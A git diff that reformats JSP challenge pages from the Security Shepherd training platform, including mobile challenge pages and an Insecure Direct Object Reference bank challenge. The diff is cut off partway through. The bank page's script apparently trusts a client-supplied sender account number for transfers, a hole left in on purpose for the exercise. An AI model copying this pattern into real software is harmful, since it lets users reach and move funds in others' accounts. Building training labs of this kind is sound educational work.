-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp b/src/main/webapp/challenges/072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp
index ecf4bda18..6a3ed5c78 100644
--- a/src/main/webapp/challenges/072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp
+++ b/src/main/webapp/challenges/072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp
@@ -1,92 +1,99 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*, org.owasp.encoder.Encode" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Reverse Engineer 1";
+String levelName = "Mobile Reverse Engineer 1";
 //Alphanumeric Only
-    String levelHash = "072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp";
+String levelHash = "072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge1.challengeName");
-    String paragraph1 = bundle.getString("challenge1.para1");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-
+String i18nLevelName = bundle.getString("challenge1.challengeName");
+String paragraph1 = bundle.getString("challenge1.para1");
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-        <br/>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer1.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<br />
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " ReverseEngineer1.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851.jsp b/src/main/webapp/challenges/11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851.jsp
index 9ad358eeb..a045b29bf 100644
--- a/src/main/webapp/challenges/11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851.jsp
+++ b/src/main/webapp/challenges/11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851.jsp
@@ -1,94 +1,101 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Insecure Data Storage 3";
+String levelName = "Mobile Insecure Data Storage 3";
 //Alphanumeric Only
-    String levelHash = "11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851";
+String levelHash = "11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 //Used more than once translations
-    String LevelName = bundle.getString("challenge3.challengeName");
-    String paragraph1 = bundle.getString("challenge3.para1");
+String LevelName = bundle.getString("challenge3.challengeName");
+String paragraph1 = bundle.getString("challenge3.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= levelName %>
-    </h2>
-    <p>
-        <br/>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= levelName %></h2>
+		<p>
+			<br />
 
-        <%= paragraph1 %>
+			<%= paragraph1 %>
 
-        <br/> <br/>
+			<br /> <br />
 
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData4.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData4.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.jsp b/src/main/webapp/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.jsp
index e14100b05..15614cd91 100644
--- a/src/main/webapp/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.jsp
+++ b/src/main/webapp/challenges/1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c.jsp
@@ -1,346 +1,357 @@
-<%@page import="servlets.module.challenge.DirectObjectBankLogin" %>
+<%@page import="servlets.module.challenge.DirectObjectBankLogin"%>
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="utils.*, servlets.module.challenge.DirectObjectBankLogin"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="utils.*, servlets.module.challenge.DirectObjectBankLogin"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "Insecure Direct Object Reference Bank Challenge";
+String levelName = "Insecure Direct Object Reference Bank Challenge";
 //Alphanumeric Only
-    String levelHash = "1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c";
+String levelHash = "1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c"; 
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
 //Used more than once translations
-    String i18nChallengeName = bundle.getString("challenge.challengeName");
+String i18nChallengeName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            //Is the user signed in?
-            boolean bankSessionDetected = false;
-            String currentBankAccountNumber = new String();
-            if (ses.getAttribute("directObjectBankAccount") != null) {
-                currentBankAccountNumber = ses.getAttribute("directObjectBankAccount").toString();
-                bankSessionDetected = true;
-            }
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		//Is the user signed in?
+		boolean bankSessionDetected = false;
+		String currentBankAccountNumber = new String();
+		if(ses.getAttribute("directObjectBankAccount") != null)
+		{
+			currentBankAccountNumber = ses.getAttribute("directObjectBankAccount").toString();
+			bankSessionDetected = true;
+		}
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= levelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.whatToDo") %>
-        <br/> <br/>
-    <h1 class='title'><%= bundle.getString("insecureBank.title") %>
-    </h1>
-    <p><%= bundle.getString("insecureBank.message") %>
-    </p>
-    <div id="unauthDiv" <% if (bankSessionDetected) { %>
-         style="display: none;" <% } %>>
-        <h2 class="title"><%= bundle.getString("insecureBank.signInNow") %>
-        </h2>
-        <p><%= bundle.getString("insecureBank.signInNow.message") %>
-        </p>
-        <div id="loginFormDiv">
-            <form id="loginForm" action="javascript:;">
-                <table>
-                    <tr>
-                        <td><%= bundle.getString("loginForm.holder") %>
-                        </td>
-                        <td><input type="text" id="loginAccountHolder"
-                                   autocomplete="off"></td>
-                    </tr>
-                    <tr>
-                        <td><%= bundle.getString("loginForm.password") %>
-                        </td>
-                        <td><input type="password" id="loginAccountPassword"
-                                   autocomplete="off"></td>
-                    </tr>
-                    <tr>
-                        <td colspan="2"><input type="submit"
-                                               value="<%= bundle.getString("loginForm.signIn") %>"></td>
-                    </tr>
-                </table>
-            </form>
-        </div>
-        <p style="display: none;" id="loginLoadingSign"><%= bundle.getString("form.loading") %>
-        </p>
-        <div id="loginResultsDiv"></div>
-        <br> <br>
-        <h2 class="title"><%= bundle.getString("register.makeAccount") %>
-        </h2>
-        <p><%= bundle.getString("register.makeAccount.message") %>
-        </p>
-        <div id="registrationFormDiv">
-            <form id="registrationForm" action="javascript:;">
-                <table>
-                    <tr>
-                        <td><%= bundle.getString("loginForm.holder") %>
-                        </td>
-                        <td><input type="text" id="registrationAccountHolder"
-                                   autocomplete="off"></td>
-                    </tr>
-                    <tr>
-                        <td><%= bundle.getString("loginForm.password") %>
-                        </td>
-                        <td><input type="password" id="registrationAccountPassword"
-                                   autocomplete="off"></td>
-                    </tr>
-                    <tr>
-                        <td colspan="2"><input type="submit"
-                                               value="<%= bundle.getString("register.createAccount") %>"></td>
-                    </tr>
-                </table>
-            </form>
-        </div>
-        <p style="display: none;" id="registrationLoadingSign"><%= bundle.getString("form.loading") %>
-        </p>
-        <div id="registrationResultsDiv"></div>
-    </div>
-    <div id="authenticatedDiv" <% if (!bankSessionDetected) { %>
-         style="display: none;" <% } %>>
-        <% if (bankSessionDetected) { %>
-        <%= DirectObjectBankLogin.bankForm(currentBankAccountNumber, getServletContext().getRealPath(""), ses) %>
-        <% } %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#loginForm").submit(function () {
-        var theAccountHolder = $("#loginAccountHolder").val();
-        var theAccountPass = $("#loginAccountPassword").val();
-        $("#loginResultsDiv").hide("fast");
-        $("#loginLoadingSign").show("slow");
-        $("#loginFormDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    accountHolder: theAccountHolder,
-                    accountPass: theAccountPass
-                },
-                async: false
-            });
-            $("#loginLoadingSign").hide("fast", function () {
-                if (ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR")) {
-                    $("#authenticatedDiv").html(ajaxCall.responseText);
-                    $("#unauthDiv").slideUp("fast");
-                    $("#authenticatedDiv").slideDown("slow");
-                } else {
-                    if (ajaxCall.responseText.startsWith("ERROR"))
-                        $("#loginResultsDiv").html(ajaxCall.responseText);
-                    else
-                        $("#loginResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                    $("#loginResultsDiv").show("fast");
-                    $("#loginFormDiv").slideDown("slow");
-                }
-            });
-        });
-    });
-
-    $("#registrationForm").submit(function () {
-        var theAccountHolder = $("#registrationAccountHolder").val();
-        var theAccountPass = $("#registrationAccountPassword").val();
-        $("#registrationResultsDiv").hide("fast");
-        $("#registrationLoadingSign").show("slow");
-        $("#registrationFormDiv").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>Reg",
-                data: {
-                    accountHolder: theAccountHolder,
-                    accountPass: theAccountPass
-                },
-                async: false
-            });
-            $("#registrationLoadingSign").hide("fast", function () {
-                if (ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR")) {
-                    $("#registrationResultsDiv").html(ajaxCall.responseText);
-                } else {
-                    $("#registrationResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + ".</p>");
-                }
-                $("#registrationResultsDiv").show("fast");
-                $("#registrationFormDiv").slideDown("slow");
-            });
-        });
-    });
-
-    function refreshFunds() {
-        console.log("Updating Balance");
-        var theAccountNumber = $("#currentAccountNumber").val();
-        console.log("The Account Number: " + theAccountNumber);
-        $("#refreshLoadingSign").show("slow");
-        $("#refreshFormDiv").slideUp("fast", function () {
-            console.log("Sending Ajax Request");
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>CurrentBalance",
-                data: {
-                    accountNumber: theAccountNumber
-                },
-                async: false
-            });
-            $("#refreshLoadingSign").hide("fast", function () {
-                if (ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR")) {
-                    console.log("Updating Balance...");
-                    //Relist Current mode
-                    $("#currentAccountBalanceDiv").fadeOut("slow", function () {
-                        $("#currentAccountBalanceDiv").text(ajaxCall.responseText);
-                    });
-                    $("#currentAccountBalanceDiv").fadeIn("slow");
-                } else {
-                    console.log("Error Detected");
-                    if (ajaxCall.responseText.startsWith("ERROR"))
-                        $("#refreshResultsDiv").html("ajaxCall.responseText");
-                    else
-                        $("#refreshResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#refreshResultsDiv").show("fast");
-                $("#refreshFormDiv").slideDown("slow");
-            });
-        });
-        console.log("Finished!");
-    }
-
-    function transferFunds() {
-        console.log("Transfering Funds");
-        var theRecieverNumber = $("#recieverAccountNumber").val();
-        console.log("theRecieverNumber: " + theRecieverNumber);
-        var theSenderNumber = $("#currentAccountNumber").val();
-        console.log("theSenderNumber: " + theSenderNumber);
-        var theTransferAmount = $("#transferAmount").val();
-        console.log("theTransferAmount: " + theTransferAmount);
-        console.log("Got Data from Form");
-        console.log("Hiding results div");
-        $("#transferResultsDiv").hide("fast");
-        console.log("Showing Loading Div");
-        $("#transferLoadingDiv").show("slow");
-        console.log("Hiding transferFundsForm");
-        $("#transferFundsForm").slideUp("fast", function () {
-            console.log("Sending Ajax Request");
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>Transfer",
-                data: {
-                    senderAccountNumber: theSenderNumber,
-                    recieverAccountNumber: theRecieverNumber,
-                    transferAmount: theTransferAmount
-                },
-                async: false
-            });
-            $("#transferLoadingDiv").hide("fast", function () {
-                console.log("Putting Response Info In DOM");
-                if (ajaxCall.status == 200) {
-                    $("#transferResultsDiv").html(ajaxCall.responseText);
-                } else {
-                    $("#transferResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#transferResultsDiv").show("fast");
-                $("#transferFundsForm").slideDown("slow");
-            });
-        });
-        console.log("Done!");
-    }
-
-    function logout() {
-        console.log("Signing Out");
-        console.log("Hiding Results Div");
-        $("#logoutResultsDiv").hide("fast");
-        console.log("Showing Loading Div");
-        $("#logoutLoadingSign").show("slow");
-        console.log("Hiding Logout Form Div");
-        $("#logoutFormDiv").slideUp("fast", function () {
-            console.log("Sending Ajax Request");
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>Logout",
-                async: false
-            });
-            console.log("Ajax Send, Hiding Loading Div");
-            $("#logoutLoadingSign").hide("fast", function () {
-                console.log("Checking Ajax Response");
-                if (ajaxCall.status == 200 && !ajaxCall.responseText.startsWith("ERROR")) {
-                    console.log("Hiding Authenticated Div and showing Login Div");
-                    $("#authenticatedDiv").slideUp("fast");
-                    $("#authenticatedDiv").html("");
-                    $("#unauthDiv").slideDown("slow");
-                    $("#loginAccountHolder").val("");
-                    $("#loginAccountPassword").val("");
-                    $("#loginFormDiv").show("slow");
-                    $('html, body').animate({
-                        scrollTop: $("#loginFormDiv").offset().top
-                    }, 1000);
-                } else {
-                    console.log("Something Went Wrong: " + ajaxCall.responseText);
-                    if (ajaxCall.responseText.startsWith("ERROR"))
-                        $("#logoutResultsDiv").html(ajaxCall.responseText);
-                    else
-                        $("#logoutResultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
